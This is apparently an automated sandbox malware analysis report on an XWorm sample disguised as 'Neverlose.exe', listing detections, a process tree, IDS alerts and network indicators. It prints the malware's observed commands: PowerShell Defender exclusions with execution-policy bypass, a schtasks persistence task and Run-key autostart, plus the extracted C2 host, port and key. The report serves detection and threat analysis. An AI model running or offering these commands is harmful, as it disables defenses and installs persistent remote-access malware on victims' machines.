
Windows Analysis Report
Neverlose.exe

Overview

General Information

Sample name: Neverlose.exe
Analysis ID: 1498483
MD5: 39d6ec26690ffee2e74fb9694b30453c
SHA1: 85a689c84e3a6584ed2cfca6da05c54a7ebfeb18
SHA256: 4bf2d648bf901a9c4f26b43f85e26b6659e22657a3d308dea668de43fed2dfdb
Tags: exe

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Creates multiple autostart registry keys
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Neverlose.exe (PID: 5888 cmdline: "C:\Users\user\Desktop\Neverlose.exe" MD5: 39D6EC26690FFEE2E74FB9694B30453C)
    • powershell.exe (PID: 2504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Solara.exe (PID: 7184 cmdline: "C:\Users\user\AppData\Local\Temp\Solara.exe" MD5: 8AC3D32DDD136180B75C36A39398F39F)
      • powershell.exe (PID: 7388 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7832 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Solara.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8064 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\sv_chost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4312 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'sv_chost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 1188 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sv_chost" /tr "C:\Users\user\AppData\Roaming\sv_chost.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 1312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SolaraBootstrapper.exe (PID: 7200 cmdline: "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe" MD5: 6557BD5240397F026E675AFB78544A26)
      • conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Solara.exe (PID: 7664 cmdline: "C:\Users\user\AppData\Local\Temp\Solara.exe" MD5: 8AC3D32DDD136180B75C36A39398F39F)
  • Solara.exe (PID: 7980 cmdline: "C:\Users\user\AppData\Local\Temp\Solara.exe" MD5: 8AC3D32DDD136180B75C36A39398F39F)
  • sv_chost.exe (PID: 7624 cmdline: C:\Users\user\AppData\Roaming\sv_chost.exe MD5: 8AC3D32DDD136180B75C36A39398F39F)
  • sv_chost.exe (PID: 7780 cmdline: "C:\Users\user\AppData\Roaming\sv_chost.exe" MD5: 8AC3D32DDD136180B75C36A39398F39F)
  • sv_chost.exe (PID: 7460 cmdline: "C:\Users\user\AppData\Roaming\sv_chost.exe" MD5: 8AC3D32DDD136180B75C36A39398F39F)
  • cleanup
{"C2 url": ["22.ip.gl.ply.gg"], "Port": "14520", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\Solara.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Local\Temp\Solara.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x12991:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x12a2e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x12b43:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x112e3:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Roaming\sv_chost.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Roaming\sv_chost.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x12991:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x12a2e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x12b43:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x112e3:$cnc4: POST / HTTP/1.1
Source | Rule | Description | Author | Strings
00000004.00000000.1722027125.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000004.00000000.1722027125.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x12791:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1282e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x12943:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x110e3:$cnc4: POST / HTTP/1.1
00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x1e841:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1e8de:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x1e9f3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x1d193:$cnc4: POST / HTTP/1.1
Process Memory Space: Neverlose.exe PID: 5888 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
Source | Rule | Description | Author | Strings
4.0.Solara.exe.da0000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
4.0.Solara.exe.da0000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x12991:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x12a2e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x12b43:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x112e3:$cnc4: POST / HTTP/1.1
0.2.Neverlose.exe.3942eb0.5.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.Neverlose.exe.3942eb0.5.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x10b91:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x10c2e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x10d43:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xf4e3:$cnc4: POST / HTTP/1.1
0.2.Neverlose.exe.3942eb0.5.raw.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

System Summary

Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\user\AppData\Local\Temp\Solara.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Neverlose.exe, ProcessId: 5888, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Neverlose.exe", ParentImage: C:\Users\user\Desktop\Neverlose.exe, ParentProcessId: 5888, ParentProcessName: Neverlose.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', ProcessId: 2504, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Neverlose.exe", ParentImage: C:\Users\user\Desktop\Neverlose.exe, ParentProcessId: 5888, ParentProcessName: Neverlose.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', ProcessId: 2504, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Neverlose.exe", ParentImage: C:\Users\user\Desktop\Neverlose.exe, ParentProcessId: 5888, ParentProcessName: Neverlose.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', ProcessId: 2504, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Neverlose.exe", ParentImage: C:\Users\user\Desktop\Neverlose.exe, ParentProcessId: 5888, ParentProcessName: Neverlose.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', ProcessId: 2504, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Local\Temp\Solara.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Neverlose.exe, ProcessId: 5888, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Neverlose.exe", ParentImage: C:\Users\user\Desktop\Neverlose.exe, ParentProcessId: 5888, ParentProcessName: Neverlose.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', ProcessId: 2504, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Solara.exe, ProcessId: 7184, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sv_chost.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sv_chost" /tr "C:\Users\user\AppData\Roaming\sv_chost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sv_chost" /tr "C:\Users\user\AppData\Roaming\sv_chost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Solara.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Solara.exe, ParentProcessId: 7184, ParentProcessName: Solara.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sv_chost" /tr "C:\Users\user\AppData\Roaming\sv_chost.exe", ProcessId: 1188, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sv_chost" /tr "C:\Users\user\AppData\Roaming\sv_chost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sv_chost" /tr "C:\Users\user\AppData\Roaming\sv_chost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Solara.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Solara.exe, ParentProcessId: 7184, ParentProcessName: Solara.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sv_chost" /tr "C:\Users\user\AppData\Roaming\sv_chost.exe", ProcessId: 1188, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Neverlose.exe", ParentImage: C:\Users\user\Desktop\Neverlose.exe, ParentProcessId: 5888, ParentProcessName: Neverlose.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', ProcessId: 2504, ProcessName: powershell.exe
Timestamp: 2024-08-24T21:55:06.804547+0200
SID: 2803305
Severity: 3
Source Port: 49732
Destination Port: 443
Protocol: TCP
Classtype: Unknown Traffic

Timestamp: 2024-08-24T21:57:03.276679+0200
SID: 2855924
Severity: 1
Source Port: 49741
Destination Port: 14520
Protocol: TCP
Classtype: Malware Command and Control Activity Detected


AV Detection

Source: Neverlose.exe | Avira: detected
Source: 22.ip.gl.ply.gg | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: 0000000F.00000002.1976951669.00000000028F1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["22.ip.gl.ply.gg"], "Port": "14520", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe | ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Roaming\sv_chost.exe | ReversingLabs: Detection: 76%
Source: Neverlose.exe | Virustotal: Detection: 41%
Source: Neverlose.exe | ReversingLabs: Detection: 73%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\Solara.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Joe Sandbox ML: detected
Source: Neverlose.exe | Joe Sandbox ML: detected
Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack | String decryptor: 22.ip.gl.ply.gg
Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack | String decryptor: 14520
Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack | String decryptor: <123456789>
Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack | String decryptor: <Xwormmm>
Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack | String decryptor: Cheat_User
Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack | String decryptor: USB.exe
Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack | String decryptor: %AppData%
Source: 0.2.Neverlose.exe.3942eb0.5.raw.unpack | String decryptor: sv_chost.exe

Compliance

Source: C:\Users\user\Desktop\Neverlose.exe | Unpacked PE file: 0.2.Neverlose.exe.ff0000.0.unpack
Source: Neverlose.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: Binary string: C:\Users\Ashtin\Desktop\WTF\SolaraBootstrapper\SolaraBootstrapper\obj\Debug\SolaraBootstrapper.pdbgI | source: Neverlose.exe, 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp, Neverlose.exe, 00000000.00000002.1730503666.0000000003921000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000000.1722482732.00000000008C2000.00000002.00000001.01000000.00000008.sdmp, SolaraBootstrapper.exe.0.dr
Source: Binary string: C:\Users\Ashtin\Desktop\WTF\SolaraBootstrapper\SolaraBootstrapper\obj\Debug\SolaraBootstrapper.pdb | source: Neverlose.exe, 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp, Neverlose.exe, 00000000.00000002.1730503666.0000000003921000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000000.1722482732.00000000008C2000.00000002.00000001.01000000.00000008.sdmp, SolaraBootstrapper.exe.0.dr

Networking

Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49741 -> 147.185.221.22:14520
Source: Malware configuration extractor | URLs: 22.ip.gl.ply.gg
Source: global traffic | TCP traffic: 147.185.221.22 ports 0,1,2,4,5,14520
Source: Yara match | File source: 0.2.Neverlose.exe.3939200.4.raw.unpack, type: UNPACKEDPE
Source: global traffic | TCP traffic: 192.168.2.4:49740 -> 147.185.221.22:14520
Source: global traffic | HTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1 | Host: github.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1 | Host: github.com
Source: Joe Sandbox View | IP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox View | IP Address: 147.185.221.22 147.185.221.22
Source: Joe Sandbox View | IP Address: 140.82.121.4 140.82.121.4
Source: Joe Sandbox View | ASN Name: SALSGIVERUS SALSGIVERUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 140.82.121.4:443
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1 | Host: github.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /quivings/Solara/main/Storage/version.txt HTTP/1.1 | User-Agent: Solara | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /quivings/Solara/raw/main/Files/Solara.Dir.zip HTTP/1.1 | Host: github.com
Source: global traffic | DNS traffic detected: DNS query: github.com
Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic | DNS traffic detected: DNS query: 22.ip.gl.ply.gg
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: GitHub.com | Date: Sat, 24 Aug 2024 19:55:04 GMT | Content-Type: text/html; charset=utf-8 | Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With | Cache-Control: no-cache | Strict-Transport-Security: max-age=31536000; includeSubdomains; preload | X-Frame-Options: deny | X-Content-Type-Options: nosniff | X-XSS-Protection: 0 | Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
